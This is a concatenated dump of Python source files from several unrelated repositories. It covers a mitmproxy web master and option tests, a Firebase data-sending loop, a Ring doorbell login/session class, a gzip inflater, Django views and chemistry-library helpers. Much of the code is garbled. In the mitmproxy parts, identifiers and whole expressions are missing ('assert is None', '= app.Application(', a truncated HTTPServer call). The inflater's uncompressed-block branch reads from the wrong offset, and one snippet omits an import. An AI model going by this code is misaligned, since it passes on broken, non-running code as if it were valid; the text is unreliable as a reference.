self.options.changed.connect(self._sig_options_update) self.options.changed.connect(self._sig_settings_update) self.addons.add(*addons.default_addons()) self.addons.add( webaddons.WebAddon(), intercept.Intercept(), readfile.ReadFile(), static_viewer.StaticViewer(), self.view,, ) if with_termlog: self.addons.add(termlog.TermLog(), termstatus.TermStatus()) = app.Application( self, self.options.web_debug ) def _sig_view_add(self, view, flow): app.ClientConnection.broadcast( resource="flows", cmd="add", data=app.flow_to_json(flow) ) def _sig_view_update(self, view, flow): app.ClientConnection.broadcast( resource="flows", cmd="update", data=app.flow_to_json(flow) ) def _sig_view_remove(self, view, flow, index): app.ClientConnection.broadcast( resource="flows", cmd="remove", ) def _sig_view_refresh(self, view): app.ClientConnection.broadcast( resource="flows", cmd="reset" ) def _sig_events_add(self, event_store, entry: log.LogEntry): app.ClientConnection.broadcast( resource="events", cmd="add", data=app.logentry_to_json(entry) ) def _sig_events_refresh(self, event_store): app.ClientConnection.broadcast( resource="events", cmd="reset" ) def _sig_options_update(self, options, updated): options_dict = optmanager.dump_dicts(options, updated) app.ClientConnection.broadcast( resource="options", cmd="update", data=options_dict ) def _sig_settings_update(self, options, updated): app.ClientConnection.broadcast( resource="settings", cmd="update", data={k: getattr(options, k) for k in updated} ) def run(self): # pragma: no cover iol = tornado.ioloop.IOLoop.instance() http_server = tornado.httpserver.HTTPServer( http_server.listen(self.options.web_port, self.options.web_iface) iol.add_callback(self.start) tornado.ioloop.PeriodicCallback(lambda: self.tick(timeout=0), 5).start() web_url = "http://{}:{}/".format(self.options.web_iface, self.options.web_port) self.add_log( "Web server listening at {}".format(web_url), "info" ) if self.options.web_open_browser: success = open_browser(web_url) if not success: self.add_log( "No web browser found. Please open a browser and point it to {}".format(web_url), "info" ) try: iol.start() except KeyboardInterrupt: self.shutdown() def shutdown(self): tornado.ioloop.IOLoop.instance().stop() super().shutdown() def open_browser(url: str) -> bool: """ Open a URL in a browser window. In contrast to, we limit the list of suitable browsers. This gracefully degrades to a no-op on headless servers, where would otherwise open lynx. Returns: True, if a browser has been opened False, if no suitable browser has been found. """ browsers = ( "windows-default", "macosx", "google-chrome", "chrome", "chromium", "chromium-browser", "firefox", "opera", "safari", ) for browser in browsers: try: b = webbrowser.get(browser) except webbrowser.Error: pass else: return True return False ``` #### File: test/mitmproxy/ ```python import copy import pytest import typing import argparse from mitmproxy import options from mitmproxy import optmanager from mitmproxy import exceptions class TO(optmanager.OptManager): def __init__(self): super().__init__() self.add_option("one", typing.Optional[int], None, "help") self.add_option("two", typing.Optional[int], 2, "help") self.add_option("bool", bool, False, "help") self.add_option("required_int", int, 2, "help") class TD(optmanager.OptManager): def __init__(self): super().__init__() self.add_option("one", str, "done", "help") self.add_option("two", str, "dtwo", "help") class TD2(TD): def __init__(self): super().__init__() self.add_option("three", str, "dthree", "help") self.add_option("four", str, "dfour", "help") class TM(optmanager.OptManager): def __init__(self): super().__init__() self.add_option("two", typing.Sequence[str], ["foo"], "help") self.add_option("one", typing.Optional[str], None, "help") def test_defaults(): o = TD2() defaults = { "one": "done", "two": "dtwo", "three": "dthree", "four": "dfour", } for k, v in defaults.items(): assert o.default(k) == v assert not o.has_changed("one") newvals = dict( one="xone", two="xtwo", three="xthree", four="xfour", ) o.update(**newvals) assert o.has_changed("one") for k, v in newvals.items(): assert v == getattr(o, k) o.reset() assert not o.has_changed("one") for k in o.keys(): assert not o.has_changed(k) def test_required_int(): o = TO() with pytest.raises(exceptions.OptionsError): o.parse_setval("required_int", None) def test_deepcopy(): o = TD() copy.deepcopy(o) def test_options(): o = TO() assert o.keys() == {"bool", "one", "two", "required_int"} assert is None assert o.two == 2 = 1 assert == 1 with pytest.raises(TypeError): TO(nonexistent = "value") with pytest.raises(Exception, match="Unknown options"): o.nonexistent = "value" with pytest.raises(Exception, match="Unknown options"): o.update(nonexistent = "value") assert o.update_known(nonexistent = "value") == {"nonexistent": "value"} rec = [] def sub(opts, updated): rec.append(copy.copy(opts)) o.changed.connect(sub) = 90 assert len(rec) == 1 assert rec[-1].one == 90 o.update(one=3) assert len(rec) == 2 assert rec[-1].one == 3 def test_setter(): o = TO() f = o.setter("two") f(99) assert o.two == 99 with pytest.raises(Exception, match="No such option"): o.setter("nonexistent") def test_toggler(): o = TO() f = o.toggler("bool") assert o.bool is False f() assert o.bool is True f() assert o.bool is False with pytest.raises(Exception, match="No such option"): o.toggler("nonexistent") with pytest.raises(Exception, match="boolean options"): o.toggler("one") class Rec(): def __init__(self): self.called = None def __call__(self, *args, **kwargs): self.called = (args, kwargs) def test_subscribe(): o = TO() r = Rec() # pytest.raises keeps a reference here that interferes with the cleanup test # further down. try: o.subscribe(r, ["unknown"]) except exceptions.OptionsError: pass else: raise AssertionError assert len(o.changed.receivers) == 0 o.subscribe(r, ["two"]) = 2 assert not r.called o.two = 3 assert r.called assert len(o.changed.receivers) == 1 del r o.two = 4 assert len(o.changed.receivers) == 0 class binder: def __init__(self): self.o = TO() self.called = False self.o.subscribe(self.bound, ["two"]) def bound(self, *args, **kwargs): self.called = True t = binder() = 3 assert not t.called t.o.two = 3 assert t.called def test_rollback(): o = TO() rec = [] def sub(opts, updated): rec.append(copy.copy(opts)) recerr = [] def errsub(opts, **kwargs): recerr.append(kwargs) def err(opts, updated): if == 10: raise exceptions.OptionsError() if opts.bool is True: raise exceptions.OptionsError() o.changed.connect(sub) o.changed.connect(err) o.errored.connect(errsub) assert is None with pytest.raises(exceptions.OptionsError): = 10 assert is None with pytest.raises(exceptions.OptionsError): o.bool = True assert o.bool is False assert isinstance(recerr[0]["exc"], exceptions.OptionsError) assert is None assert o.bool is False assert len(rec) == 4 assert rec[0].one == 10 assert rec[1].one is None assert rec[2].bool is True assert rec[3].bool is False with pytest.raises(exceptions.OptionsError): with o.rollback({"one"}, reraise=True): raise exceptions.OptionsError() def test_simple(): assert repr(TO()) assert "one" in TO() def test_items(): assert TO().items() def test_serialize(): o = TD2() o.three = "set" assert "dfour" in optmanager.serialize(o, None, defaults=True) data = optmanager.serialize(o, None) assert "dfour" not in data o2 = TD2() optmanager.load(o2, data) assert o2 == o assert not o == 42 t = """ unknown: foo """ data = optmanager.serialize(o, t) o2 = TD2() optmanager.load(o2, data) assert o2 == o t = "invalid: foo\ninvalid" with pytest.raises(Exception, match="Config error"): optmanager.load(o2, t) t = "invalid" with pytest.raises(Exception, match="Config error"): optmanager.load(o2, t) t = "# a comment" optmanager.load(o2, t) assert optmanager.load(o2, "foobar: '123'") == {"foobar": "123"} t = "" optmanager.load(o2, t) assert optmanager.load(o2, "foobar: '123'") == {"foobar": "123"} def test_serialize_defaults(): o = options.Options() assert optmanager.serialize(o, None, defaults=True) def test_saving(tmpdir): o = TD2() o.three = "set" dst = str(tmpdir.join("conf")), dst, defaults=True) o2 = TD2() optmanager.load_paths(o2, dst) o2.three = "foo", dst, defaults=True) optmanager.load_paths(o, dst) assert o.three == "foo" with open(dst, 'a') as f: f.write("foobar: '123'") assert optmanager.load_paths(o, dst) == {"foobar": "123"} with open(dst, 'a') as f: f.write("'''") with pytest.raises(exceptions.OptionsError): optmanager.load_paths(o, dst) with open(dst, 'wb') as f: f.write(b"\x01\x02\x03") with pytest.raises(exceptions.OptionsError): optmanager.load_paths(o, dst) with pytest.raises(exceptions.OptionsError):, dst) with open(dst, 'wb') as f: f.write(b"\xff\xff\xff") with pytest.raises(exceptions.OptionsError): optmanager.load_paths(o, dst) with pytest.raises(exceptions.OptionsError):, dst) def test_merge(): m = TM() m.merge(dict(one="two")) assert == "two" m.merge(dict(one=None)) assert == "two" m.merge(dict(two=["bar"])) assert m.two == ["foo", "bar"] def test_option(): o = optmanager._Option("test", int, 1, "help", None) assert o.current() == 1 with pytest.raises(TypeError): o.set("foo") with pytest.raises(TypeError): optmanager._Option("test", str, 1, "help", None) o2 = optmanager._Option("test", int, 1, "help", None) assert o2 == o o2.set(5) assert o2 != o def test_dump_defaults(): o = options.Options() assert optmanager.dump_defaults(o) def test_dump_dicts(): o = options.Options() assert optmanager.dump_dicts(o) assert optmanager.dump_dicts(o, ['http2', 'anticomp']) class TTypes(optmanager.OptManager): def __init__(self): super().__init__() self.add_option("str", str, "str", "help") self.add_option("optstr", typing.Optional[str], "optstr", "help", "help") self.add_option("bool", bool, False, "help") self.add_option("bool_on", bool, True, "help") self.add_option("int", int, 0, "help") self.add_option("optint", typing.Optional[int], 0, "help") self.add_option("seqstr", typing.Sequence[str], [], "help") self.add_option("unknown", float, 0.0, "help") def test_make_parser(): parser = argparse.ArgumentParser() opts = TTypes() opts.make_parser(parser, "str", short="a") opts.make_parser(parser, "bool", short="b") opts.make_parser(parser, "int", short="c") opts.make_parser(parser, "seqstr", short="d") opts.make_parser(parser, "bool_on", short="e") with pytest.raises(ValueError): opts.make_parser(parser, "unknown") def test_set(): opts = TTypes() opts.set("str=foo") assert opts.str == "foo" with pytest.raises(TypeError): opts.set("str") opts.set("optstr=foo") assert opts.optstr == "foo" opts.set("optstr") assert opts.optstr is None opts.set("bool=false") assert opts.bool is False opts.set("bool") assert opts.bool is True opts.set("bool=true") assert opts.bool is True with pytest.raises(exceptions.OptionsError): opts.set("bool=wobble") opts.set("bool=toggle") assert opts.bool is False opts.set("bool=toggle") assert opts.bool is True opts.set("int=1") assert == 1 with pytest.raises(exceptions.OptionsError): opts.set("int=wobble") opts.set("optint") assert opts.optint is None assert opts.seqstr == [] opts.set("seqstr=foo") assert opts.seqstr == ["foo"] opts.set("seqstr=bar") assert opts.seqstr == ["foo", "bar"] opts.set("seqstr") assert opts.seqstr == [] with pytest.raises(exceptions.OptionsError): opts.set("nonexistent=wobble") ``` #### File: test/mitmproxy/ ```python import io from mitmproxy.test import taddons from mitmproxy.test import tutils from mitmproxy import ctx def test_recordingmaster(): with taddons.context() as tctx: assert not tctx.master.has_log("nonexistent") assert not tctx.master.has_event("nonexistent") ctx.log.error("foo") assert not tctx.master.has_log("foo", level="debug") assert tctx.master.has_log("foo", level="error") def test_dumplog(): with taddons.context() as tctx:"testing") s = io.StringIO() tctx.master.dump_log(s) assert s.getvalue() def test_load_script(): with taddons.context() as tctx: s = tctx.script( tutils.test_data.path( "mitmproxy/data/addonscripts/recorder/" ) ) assert s ``` #### File: 00cool/project-X/ ```python import sys import threading from threading import Thread from connect import sendDataToFire sys.path.append('../') from renderQuery import queryG, queryY, web def prepareTOsend(): while True: sendDataToFire(json.dumps(queryG)) prepareTOsend() ```
{ "source": "00Duck/RingSlackPy", "score": 3 }
#### File: 00Duck/RingSlackPy/ ```python import json import getpass import logging from uuid import uuid4 as uuid from ring_doorbell import Ring, Auth from pathlib import Path import traceback class RingSession: """ Starts a Ring session. Create a cache file and pass it into this class. On first run, use your user/password/token (I verified from the app) to log in. Once you have a token, you will re-use the token from the cache file to establish new sessions. """ def __init__(self, cache_file): self.cache_file = cache_file self.ring = None logging.basicConfig(format='%(asctime)s\t%(levelname)s\t%(message)s', datefmt='%Y-%d-%m %H:%M:%S', filename='server.log', level=logging.INFO) def get_doorbot_by_id(self, id: str): if self.ring == None: return devices = self.ring.devices() for device in devices['doorbots'] or []: if str( == id: return device return None def take_screenshot(self, device_id: str): if self.ring == None: return device = self.get_doorbot_by_id(device_id) if device != None: device.get_snapshot(retries=3, delay=2, filename="last_screenshot.jpg") def get_battery_life(self, device_id: str): if self.ring == None: return None device = self.get_doorbot_by_id(device_id) if device != None: return device.battery_life return None def hardware_id(self, hwp) -> str: if hwp.is_file(): return str(hwp.read_text()) else: uid = str(uuid()) hwp.write_text(uid) return uid def token_updater(self, token): """Write to the cache file to update with the latest refresh token. Used by the Auth class""" token['scope'] = "client" # I overwrote this because other API's use "client" instead of ["client"] self.cache_file.write_text(json.dumps(token)) def create_ring(self): """Authenticates your user and returns a Ring instance to be queried further.""" if self.cache_file.is_file(): auth = Auth("android:com.ringapp", json.loads(self.cache_file.read_text()), self.token_updater, self.hardware_id(Path('hw_id.cache'))) else: username = input("user: ") password = <PASSWORD>("password: ") token = input("2FA code: ") auth = Auth("android:com.ringapp", None, self.token_updater, self.hardware_id(Path('hw_id.cache'))) try: auth.fetch_token(username, password, token) except: logging.error("Problem fetching token from input authorization.") quit() ring = Ring(auth) if ring.session is None: try: ring.create_session() except: print(traceback.format_exc()) logging.error("Authorization error - token likely expired.") quit() self.ring = ring ```
{ "source": "00ff0000red/raw-wasm", "score": 2 }
#### File: raw-wasm/inflate/ ```python import argparse import sys MAXBITS = 15 MAXCLCODES = 19 MAXLCODES = 286 MAXDCODES = 32 FIXLCODES = 288 FIXED_LIT_LENS = [8] * 144 + [9] * 112 + [7] * 24 + [8] * 8 FIXED_DIST_LENS = [5] * 32 CODELEN_LITS = [16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15] LENGTH_BASE = [3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31, 35, 43, 51, 59, 67, 83, 99, 115, 131, 163, 195, 227, 258] DIST_BASE = [1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193, 257, 385, 513, 769, 1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577] EXTRA_LENGTH_BITS = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0] EXTRA_DIST_BITS = [0, 0, 0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12, 12, 13, 13] class Huffman(object): def __init__(self, lens, maxsyms): # build count self.count = [0] * (MAXBITS+1) for l in lens: self.count[l] += 1 # build offset offs = [0, 0] for i in range(1, MAXBITS): offs.append(offs[i] + self.count[i]) # build code -> symbol self.symbol = [0] * maxsyms for i, l in enumerate(lens): if l != 0: self.symbol[offs[l]] = i offs[l] += 1 class Inflater(object): def __init__(self, data): self.input = data + b'\0\0' # So we can read a little past the end # gzip header assert(self.input[0] == 0x1f) assert(self.input[1] == 0x8b) assert(self.input[2] == 0x08) flags = self.input[3] has_text = (flags & 1) != 0 has_crc16 = (flags & 2) != 0 has_extra = (flags & 4) != 0 has_name = (flags & 8) != 0 has_comment = (flags & 0x10) != 0 assert(not has_text) assert(not has_crc16) assert(not has_extra) assert(not has_comment) self.bit_idx = 80 # After the header if has_name: while self.input[self.bit_idx // 8] != 0: self.bit_idx += 8 self.bit_idx += 8 self.output = [] def Inflate(self): while self.ReadBlock(): pass return self.output def ReadBits(self, n): byte_idx = self.bit_idx // 8 bit_idx = self.bit_idx & 7 data = self.input[byte_idx] data |= self.input[byte_idx + 1] << 8 data |= self.input[byte_idx + 2] << 16 data >>= bit_idx data &= ((1 << n) - 1) self.bit_idx += n # print(f'ReadBits({n}) => {data}') return data def ReadBlock(self): bfinal = self.ReadBits(1) btype = self.ReadBits(2) if btype == 0: # uncompressed self.bit_idx = (self.bit_idx + 7) & ~7 # align len_ = self.ReadBits(16) nlen_ = self.ReadBits(16) self.output.extend(self.input[0:len_]) self.bit_idx += len_ * 8 return not bfinal elif btype == 1: # fixed huffman lit_huff = Huffman(FIXED_LIT_LENS, FIXLCODES) dist_huff = Huffman(FIXED_DIST_LENS, MAXDCODES) elif btype == 2: # dynamic huffman hlit = self.ReadBits(5) + 257 hdist = self.ReadBits(5) + 1 hclen = self.ReadBits(4) + 4 lens = [0] * MAXCLCODES for i in range(hclen): lens[CODELEN_LITS[i]] = self.ReadBits(3) codelen_huff = Huffman(lens, MAXCLCODES) lits_dists = self.ReadCodeLens(codelen_huff, hlit + hdist) lit_huff = Huffman(lits_dists[:hlit], MAXLCODES) dist_huff = Huffman(lits_dists[hlit:], MAXDCODES) else: # reserved assert(False) while True: code = self.ReadCode(lit_huff) if code < 256: self.output.append(code) print(f'>> Output ({repr(chr(code))})') elif code == 256: print(f'>> Stop') break else: lextra = self.ReadBits(EXTRA_LENGTH_BITS[code - 257]) length = LENGTH_BASE[code - 257] + lextra dcode = self.ReadCode(dist_huff) dextra = self.ReadBits(EXTRA_DIST_BITS[dcode]) dist = DIST_BASE[dcode] + dextra for i in range(length): self.output.append(self.output[-dist]) print(f">> Ref ({dist}, {length}) = {repr(''.join(map(chr, self.output[-length:])))}") return not bfinal def ReadCode(self, huffman): code = 0 first = 0 index = 0 for i in range(1, MAXBITS+1): code |= self.ReadBits(1) count = huffman.count[i] if code - count < first: sym = huffman.symbol[index + (code - first)] # print(f'ReadCode() => {sym} ({repr(chr(sym))})') return sym index += count first += count first <<= 1 code <<= 1 raise Exception('Unknown code!') def ReadCodeLens(self, huffman, count): res = [] while len(res) < count: x = self.ReadCode(huffman) if x < 16: res.append(x) continue elif x == 16: rep_val = res[-1] rep_cnt = 3 + self.ReadBits(2) elif x == 17: rep_val = 0 rep_cnt = 3 + self.ReadBits(3) elif x == 18: rep_val = 0 rep_cnt = 11 + self.ReadBits(7) res += [rep_val] * rep_cnt return res def main(args): parser = argparse.ArgumentParser() parser.add_argument('file') args = parser.parse_args(args) inflater = Inflater(open(args.file, 'rb').read()) output = ''.join(map(chr, inflater.Inflate())) # print('output', output) # print('len', len(output)) if __name__ == '__main__': sys.exit(main(sys.argv[1:])) ```
{ "source": "00FFEF/Team_Project", "score": 2 }
#### File: Team_Project/home/ ```python import json from django.shortcuts import render from django.http import HttpResponse from templates.MyAnalysis import MyAnalysis import sqlite3 import pandas as pd import sqlite3 # Create your views here. def main(request): return render(request, 'index.html') def scrapping_index(request): return render(request,'scrapping_index.html') def machine_index(request): result = dict() conn = sqlite3.connect('db.sqlite3') conn.row_factory = sqlite3.Row # for getting columns curs = conn.cursor() curs.execute('select * from dbapp_admachine da') data = curs.fetchall() for row in data: print(row['Age']) print(row['EstimatedSalary']) print(row['Gender']) print(row['Purchased']) print(row['UserID']) print(row['id']) result['erows'] = data return render(request,'machine_index.html',result) def service_index(request): return render(request,'service_index.html') def kakao_chart(request): data = MyAnalysis().kakaoo() return HttpResponse(json.dumps(data), content_type='application/json') def naver_chart(request): data = MyAnalysis().never() return HttpResponse(json.dumps(data), content_type='application/json') def ad(request): conn = sqlite3.connect("../db.sqlite3") df = pd.read_sql_query('select * from dbapp_admachine da', conn) age = df['Age'] sal = df['EstimatedSalary'] gen = df['Gender'] pur = df['Purchased'] uid = df['UserID'] result = {'Age' : age, 'Estimated Salary' : sal, 'Gender' : gen, 'Purchased' : pur, 'User ID' : uid} return render(request, 'machine_index.html', context=result) ```
{ "source": "00Green27/Indigo", "score": 2 }
#### File: bingo_elastic/model/ ```python from pathlib import Path from typing import Callable, Generator, Optional, Union from indigo import Indigo, IndigoObject from bingo_elastic.model.record import IndigoRecord def iterate_file( file: Path, iterator: str = None, error_handler: Optional[Callable[[object, BaseException], None]] = None, ) -> Generator[IndigoRecord, None, None]: """ :param file: :param iterator: supported iterators sdf, smiles, smi, cml. If iterator is not set, trying to determine iterator by file extension :type iterator: str :param error_handler: lambda for catching exceptions :type error_handler: Optional[Callable[[object, BaseException], None]] :return: """ iterators = { "sdf": "iterateSDFile", "smiles": "iterateSmilesFile", "smi": "iterateSmilesFile", "cml": "iterateCMLFile", } if not iterator: iterator = file.suffix[1:] iterator_fn = iterators.get(iterator) if not iterator_fn: raise AttributeError(f"Unsupported iterator {iterator}") indigo_object: IndigoObject for indigo_object in getattr(Indigo(), iterator_fn)(str(file)): yield IndigoRecord( indigo_object=indigo_object, error_handler=error_handler ) def iterate_sdf( file: Union[Path, str], error_handler: Optional[Callable[[object, BaseException], None]] = None, ) -> Generator: yield from iterate_file( Path(file) if isinstance(file, str) else file, "sdf", error_handler=error_handler, ) def iterate_smiles( file: Union[Path, str], error_handler: Optional[Callable[[object, BaseException], None]] = None, ) -> Generator: yield from iterate_file( Path(file) if isinstance(file, str) else file, "smiles", error_handler=error_handler, ) def iterate_cml( file: Union[Path, str], error_handler: Optional[Callable[[object, BaseException], None]] = None, ) -> Generator: yield from iterate_file( Path(file) if isinstance(file, str) else file, "cml", error_handler=error_handler, ) ``` #### File: tests/model/ ```python from pathlib import Path from typing import Callable import bingo_elastic.model.helpers as helpers def test_iterate_sdf(resource_loader: Callable[[str], str]): results = [] for step in range(0, 2): if 0 == step: sdf = helpers.iterate_sdf( resource_loader("resources/rand_queries_small.sdf") ) else: sdf = helpers.iterate_file( Path(resource_loader("resources/rand_queries_small.sdf")) ) i = 0 for i, _ in enumerate(sdf, start=1): pass results.append(i) assert results[0] == results[1] def test_iterate_smiles(resource_loader: Callable[[str], str]): results = [] for step in range(0, 2): if 0 == step: smiles = helpers.iterate_smiles( resource_loader("resources/pubchem_slice_50.smi") ) else: smiles = helpers.iterate_file( Path(resource_loader("resources/pubchem_slice_50.smi")) ) i = 0 for i, _ in enumerate(smiles, start=1): pass results.append(i) assert results[0] == results[1] def test_iterate_cml(resource_loader: Callable[[str], str]): results = [] for step in range(0, 2): if 0 == step: cml = helpers.iterate_cml( resource_loader("resources/tetrahedral-all.cml") ) else: cml = helpers.iterate_file( Path(resource_loader("resources/tetrahedral-all.cml")) ) i = 0 for i, _ in enumerate(cml, start=1): pass results.append(i) assert results[0] == results[1] ``` #### File: python/common/ ```python import sys import os from inspect import getmembers from types import BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType import zipfile from util import isIronPython, isJython, getPlatform cur_path = os.path.abspath(os.path.dirname(__file__)) distPaths = [os.path.join(cur_path, '../../../indigo/dist'), os.path.join(cur_path, '../../dist/')] success = False if isIronPython(): raise RuntimeError("Indigo coverage is not supported in .NET") elif isJython(): raise RuntimeError("Indigo coverage is not supported in Java") else: dll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/python")) rdll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/plugins/renderer/python")) idll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/plugins/inchi/python")) bdll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/plugins/bingo/python")) if not os.path.exists(os.path.join(dll_full_path, 'lib')): for distPath in distPaths: if not os.path.exists(distPath): continue dll_full_path = '%s/python' % (distPath) for item in os.listdir(distPath): if item.startswith('indigo-python-') and item.endswith('.zip') and (item.find(getPlatform()) != -1 or item.find('universal') != -1): curdir = os.path.abspath(os.curdir) os.chdir(distPath) if 'INDIGO_TEST_MODE' not in os.environ: with zipfile.ZipFile(item) as zf: zf.extractall() os.environ['INDIGO_TEST_MODE'] = '1' os.chdir(curdir) dll_full_path = os.path.abspath(os.path.join(cur_path, distPath, item.replace('.zip', ''))) break if not os.path.exists(dll_full_path): continue break sys.path.insert(0, dll_full_path) sys.path.insert(0, rdll_full_path) sys.path.insert(0, idll_full_path) sys.path.insert(0, bdll_full_path) from indigo import Indigo, IndigoObject, IndigoException from indigo_renderer import IndigoRenderer from indigo_inchi import IndigoInchi from bingo import Bingo, BingoException, BingoObject success = True if not success: raise RuntimeError('Indigo not found at %s' % distPaths) class IndigoObjectCoverageWrapper(IndigoObject): def __init__(self, dispatcher, id, parent=None): IndigoObject.__init__(self, dispatcher, id, parent) self._type = None self._type = int(self.dbgInternalType()[1:3]) def __getattribute__(self, item): dispatcher = object.__getattribute__(self, 'dispatcher') type = object.__getattribute__(self, '_type') if dispatcher is not None: if item in dispatcher._indigoObjectCoverageDict: dispatcher._indigoObjectCoverageDict[item] += 1 if type: if type not in dispatcher._indigoObjectCoverageByTypeDict: dispatcher._indigoObjectCoverageByTypeDict[type] = {} dispatcher._indigoObjectCoverageByTypeDict[type][item] = 1 else: if item not in dispatcher._indigoObjectCoverageByTypeDict[type]: dispatcher._indigoObjectCoverageByTypeDict[type][item] = 1 else: dispatcher._indigoObjectCoverageByTypeDict[type][item] += 1 return object.__getattribute__(self, item) class IndigoCoverageWrapper(Indigo): def __init__(self, path=None): Indigo.__init__(self, path) if isJython() or isIronPython(): IndigoObject = IndigoObjectCoverageWrapper # TODO: Change standard IndigoObject to IndigoObjectCoverageWrapper else: self.IndigoObject = IndigoObjectCoverageWrapper self._indigoObjectCoverageDict = dict() self._indigoObjectCoverageByTypeDict = dict() m = self.createMolecule() for item in getmembers(m): if type(item[1]) in (BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType) and not item[0].startswith('_'): self._indigoObjectCoverageDict[item[0]] = 0 self._indigoCoverageDict = dict() for item in getmembers(self): if type(item[1]) in (BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType) and not item[0].startswith('_'): self._indigoCoverageDict[item[0]] = 0 def __getattribute__(self, item): try: indigoCoverageDict = object.__getattribute__(self, '_indigoCoverageDict') if indigoCoverageDict: if item in indigoCoverageDict: indigoCoverageDict[item] += 1 except AttributeError: pass return object.__getattribute__(self, item) def version(self): return super(IndigoCoverageWrapper, self).version() + '-coverage' class IndigoObjectTypeEnum: SCANNER = 1 MOLECULE = 2 QUERY_MOLECULE = 3 REACTION = 4 QUERY_REACTION = 5 OUTPUT = 6 REACTION_ITER = 7 REACTION_MOLECULE = 8 GROSS = 9 SDF_LOADER = 10 SDF_SAVER = 11 RDF_MOLECULE = 12 RDF_REACTION = 13 RDF_LOADER = 14 SMILES_MOLECULE = 15 SMILES_REACTION = 16 MULTILINE_SMILES_LOADER = 17 ATOM = 18 ATOMS_ITER = 19 RGROUP = 20 RGROUPS_ITER = 21 RGROUP_FRAGMENT = 22 RGROUP_FRAGMENTS_ITER = 23 ARRAY = 24 ARRAY_ITER = 25 ARRAY_ELEMENT = 26 MOLECULE_SUBSTRUCTURE_MATCH_ITER = 27 MOLECULE_SUBSTRUCTURE_MATCHER = 28 REACTION_SUBSTRUCTURE_MATCHER = 29 SCAFFOLD = 30 DECONVOLUTION = 31 DECONVOLUTION_ELEM = 32 DECONVOLUTION_ITER = 33 PROPERTIES_ITER = 34 PROPERTY = 35 FINGERPRINT = 36 BOND = 37 BONDS_ITER = 38 ATOM_NEIGHBOR = 39 ATOM_NEIGHBORS_ITER = 40 SUPERATOM = 41 SUPERATOMS_ITER = 42 DATA_SGROUP = 43 DATA_SGROUPS_ITER = 44 REPEATING_UNIT = 45 REPEATING_UNITS_ITER = 46 MULTIPLE_GROUP = 47 MULTIPLE_GROUPS_ITER = 48 GENERIC_SGROUP = 49 GENERIC_SGROUPS_ITER = 50 SGROUP_ATOMS_ITER = 51 SGROUP_BONDS_ITER = 52 DECOMPOSITION = 53 COMPONENT = 54 COMPONENTS_ITER = 55 COMPONENT_ATOMS_ITER = 56 COMPONENT_BONDS_ITER = 57 SUBMOLECULE = 58 SUBMOLECULE_ATOMS_ITER = 59 SUBMOLECULE_BONDS_ITER = 60 MAPPING = 61 REACTION_MAPPING = 62 SSSR_ITER = 63 SUBTREES_ITER = 64 RINGS_ITER = 65 EDGE_SUBMOLECULE_ITER = 66 CML_MOLECULE = 67 CML_REACTION = 68 MULTIPLE_CML_LOADER = 69 SAVER = 70 ATTACHMENT_POINTS_ITER = 71 DECOMPOSITION_MATCH = 72 DECOMPOSITION_MATCH_ITER = 73 TAUTOMER_ITER = 74 TAUTOMER_MOLECULE = 75 IndigoObjectTypeDict = { 1: 'SCANNER', 2: 'MOLECULE', 3: 'QUERY_MOLECULE', 4: 'REACTION', 5: 'QUERY_REACTION', 6: 'OUTPUT', 7: 'REACTION_ITER', 8: 'REACTION_MOLECULE', 9: 'GROSS', 10: 'SDF_LOADER', 11: 'SDF_SAVER', 12: 'RDF_MOLECULE', 13: 'RDF_REACTION', 14: 'RDF_LOADER', 15: 'SMILES_MOLECULE', 16: 'SMILES_REACTION', 17: 'MULTILINE_SMILES_LOADER', 18: 'ATOM', 19: 'ATOMS_ITER', 20: 'RGROUP', 21: 'RGROUPS_ITER', 22: 'RGROUP_FRAGMENT', 23: 'RGROUP_FRAGMENTS_ITER', 24: 'ARRAY', 25: 'ARRAY_ITER', 26: 'ARRAY_ELEMENT', 27: 'MOLECULE_SUBSTRUCTURE_MATCH_ITER', 28: 'MOLECULE_SUBSTRUCTURE_MATCHER', 29: 'REACTION_SUBSTRUCTURE_MATCHER', 30: 'SCAFFOLD', 31: 'DECONVOLUTION', 32: 'DECONVOLUTION_ELEM', 33: 'DECONVOLUTION_ITER', 34: 'PROPERTIES_ITER', 35: 'PROPERTY', 36: 'FINGERPRINT', 37: 'BOND', 38: 'BONDS_ITER', 39: 'ATOM_NEIGHBOR', 40: 'ATOM_NEIGHBORS_ITER', 41: 'SUPERATOM', 42: 'SUPERATOMS_ITER', 43: 'DATA_SGROUP', 44: 'DATA_SGROUPS_ITER', 45: 'REPEATING_UNIT', 46: 'REPEATING_UNITS_ITER', 47: 'MULTIPLE_GROUP', 48: 'MULTIPLE_GROUPS_ITER', 49: 'GENERIC_SGROUP', 50: 'GENERIC_SGROUPS_ITER', 51: 'SGROUP_ATOMS_ITER', 52: 'SGROUP_BONDS_ITER', 53: 'DECOMPOSITION', 54: 'COMPONENT', 55: 'COMPONENTS_ITER', 56: 'COMPONENT_ATOMS_ITER', 57: 'COMPONENT_BONDS_ITER', 58: 'SUBMOLECULE', 59: 'SUBMOLECULE_ATOMS_ITER', 60: 'SUBMOLECULE_BONDS_ITER', 61: 'MAPPING', 62: 'REACTION_MAPPING', 63: 'SSSR_ITER', 64: 'SUBTREES_ITER', 65: 'RINGS_ITER', 66: 'EDGE_SUBMOLECULE_ITER', 67: 'CML_MOLECULE', 68: 'CML_REACTION', 69: 'MULTIPLE_CML_LOADER', 70: 'SAVER', 71: 'ATTACHMENT_POINTS_ITER', 72: 'DECOMPOSITION_MATCH', 73: 'DECOMPOSITION_MATCH_ITER', 74: 'TAUTOMER_ITER', 75: 'TAUTOMER_MOLECULE', } ``` #### File: python/common/ ```python from __future__ import with_statement import sys if sys.version_info < (3, 0): from cStringIO import StringIO 